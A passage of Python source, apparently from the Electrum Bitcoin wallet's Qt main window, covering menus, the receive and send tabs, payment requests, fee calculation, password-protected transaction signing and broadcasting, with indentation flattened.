file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
self.new_account_menu = wallet_menu.addAction(_("&New account"), self.new_account_dialog)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
wallet_menu.addAction(_("Search"), self.toggle_search).setShortcut(QKeySequence("Ctrl+S"))
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.run_network_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
if self.network.is_connected():
d = self.network.get_donation_address()
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = run_hook('format_amount_and_units', amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_account_balance(self.current_account)
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price from exchange rate plugin
rate = run_hook('get_fiat_status_text', c + u + x)
if rate:
text += rate
icon = QIcon(":icons/status_connected.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
if self.wallet.up_to_date:
self.check_next_account()
def update_tabs(self):
self.history_list.update()
self.receive_list.update()
self.address_list.update()
self.contacts_list.update()
self.invoices_list.update()
self.update_completions()
def create_history_tab(self):
from history_widget import HistoryWidget
self.history_list = l = HistoryWidget(self)
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(1)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
self.receive_list = MyTreeWidget(self, self.receive_list_menu, [_('Date'), _('Account'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 4)
self.receive_list.currentItemChanged.connect(self.receive_item_changed)
self.receive_list.itemClicked.connect(self.receive_item_changed)
self.receive_list.setSortingEnabled(True)
self.receive_list.setColumnWidth(0, 180)
self.receive_list.hideColumn(1)
self.receive_list.hideColumn(2)
self.receive_list.on_update = self.update_receive_tab
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.receive_list)
vbox.setStretchFactor(self.receive_list, 1000)
return w
def receive_item_changed(self, item):
if item is None:
return
if not self.receive_list.isItemSelected(item):
return
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
expires = util.age(req['time'] + req['exp']) if req.get('exp') else _('Never')
amount = req['amount']
message = self.wallet.labels.get(addr, '')
self.receive_address_e.setText(addr)
self.receive_message_e.setText(message)
self.receive_amount_e.setAmount(amount)
self.expires_combo.hide()
self.expires_label.show()
self.expires_label.setText(expires)
self.new_request_button.setEnabled(True)
def delete_payment_request(self, item):
addr = str(item.text(2))
self.wallet.remove_payment_request(addr, self.config)
self.receive_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def receive_list_menu(self, position):
item = self.receive_list.itemAt(position)
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
menu = QMenu(self)
menu.addAction(_("Copy Address"), lambda: self.view_and_paste(_('Address'), '', addr))
menu.addAction(_("Copy URI"), lambda: self.view_and_paste('URI', '', self.get_request_URI(addr)))
menu.addAction(_("Save as BIP70 file"), lambda: self.export_payment_request(addr))
menu.addAction(_("Delete"), lambda: self.delete_payment_request(item))
run_hook('receive_list_menu', menu, addr)
menu.exec_(self.receive_list.viewport().mapToGlobal(position))
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.receive_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(self.current_account)
if addr is None:
if isinstance(self.wallet, Imported_Wallet):
self.show_message(_('No more addresses in your wallet.'))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(self.current_account, False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_unused_address(self.current_account)
self.receive_address_e.setText(addr if addr else '')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.tabs.setCurrentIndex(2)
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_tab(self):
# hide receive tab if no receive requests available
b = len(self.wallet.receive_requests) > 0
self.receive_list.setVisible(b)
self.receive_requests_label.setVisible(b)
if not b:
self.expires_label.hide()
self.expires_combo.show()
# check if it is necessary to show the account
self.receive_list.setColumnHidden(1, len(self.wallet.get_accounts()) == 1)
# update the receive address if necessary
current_address = self.receive_address_e.text()
domain = self.wallet.get_account_addresses(self.current_account, include_change=False)
addr = self.wallet.get_unused_address(self.current_account)
if not current_address in domain and addr:
self.set_receive_address(addr)
self.new_request_button.setEnabled(addr != current_address)
# clear the list and fill it again
self.receive_list.clear()
for req in self.wallet.get_sorted_requests(self.config):
address = req['address']
if address not in domain:
continue
timestamp = req.get('time', 0)
amount = req.get('amount')
expiration = req.get('exp', None)
message = req.get('memo', '')
date = format_time(timestamp)
status = req.get('status')
signature = req.get('sig')
requestor = req.get('name', '')
amount_str = self.format_amount(amount) if amount else ""
account = ''
item = QTreeWidgetItem([date, account, address, '', message, amount_str, pr_tooltips.get(status,'')])
if signature is not None:
item.setIcon(3, QIcon(":icons/seal.png"))
item.setToolTip(3, 'signed by '+ requestor)
if status is not PR_UNKNOWN:
item.setIcon(6, QIcon(pr_icons.get(status)))
self.receive_list.addTopLevelItem(item)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def show_before_broadcast(self):
return self.config.get('show_before_broadcast', False)
def set_show_before_broadcast(self, show):
self.config.set_key('show_before_broadcast', bool(show))
self.set_send_button_text()
def set_send_button_text(self):
if self.show_before_broadcast():
text = _("Send...")
elif self.wallet and self.wallet.is_watching_only():
text = _("Send...")
else:
text = _("Send")
self.send_button.setText(text)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_e, 5, 1)
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.send_button)
buttons.addWidget(self.clear_button)
grid.addLayout(buttons, 6, 1, 1, 2)
def on_shortcut():
inputs = self.get_coins()
sendable = sum(map(lambda x:x['value'], inputs))
fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
addr = self.get_payto_or_dummy()
amount, fee = self.wallet.get_max_amount(self.config, inputs, addr, fee)
if not self.fee_e.isModified():
self.fee_e.setAmount(fee)
self.amount_e.setAmount(amount)
self.not_enough_funds = (fee + amount > sendable)
# emit signal for fiat_amount update
self.amount_e.textEdited.emit("")
self.amount_e.shortcut.connect(on_shortcut)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
self.invoices_list = MyTreeWidget(self, self.invoices_list_menu,
[_('Expires'), _('Requestor'), _('Description'), _('Amount'), _('Status')], 2)
self.invoices_list.setSortingEnabled(True)
self.invoices_list.header().setResizeMode(1, QHeaderView.Interactive)
self.invoices_list.setColumnWidth(1, 200)
self.invoices_list.on_update = self.update_invoices_list
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoices_list)
vbox.setStretchFactor(self.invoices_list, 1000)
# Defer this until grid is parented to avoid ugly flash during startup
self.update_fee_edit()
run_hook('create_send_tab', grid)
return w
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
return self.payto_e.payto_address if self.payto_e.payto_address else self.wallet.dummy_address()
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs()
if not outputs:
addr = self.get_payto_or_dummy()
outputs = [(TYPE_ADDRESS, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('can_edit_fees', False)
self.fee_e.setVisible(b)
self.fee_e_label.setVisible(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, value = self.contacts.get(key)
return key + ' <' + value + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.use_encryption:
password = self.password_dialog(parent=parent)
try:
if password:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs()
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee = self.fee_e.get_amount()
if fee is None:
self.show_error(_('Invalid Fee'))
return
coins = self.get_coins()
return outputs, fee, label, coins
def do_send(self):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
if tx.get_fee() < self.wallet.relayfee() and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if self.show_before_broadcast():
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.use_encryption:
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
if self.wallet.use_encryption and not password:
callback(False) # User cancelled password input
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
pr.set_paid(tx.hash())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.hash(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoices_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
dialog.exec_()
return clayout.selected_index()
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
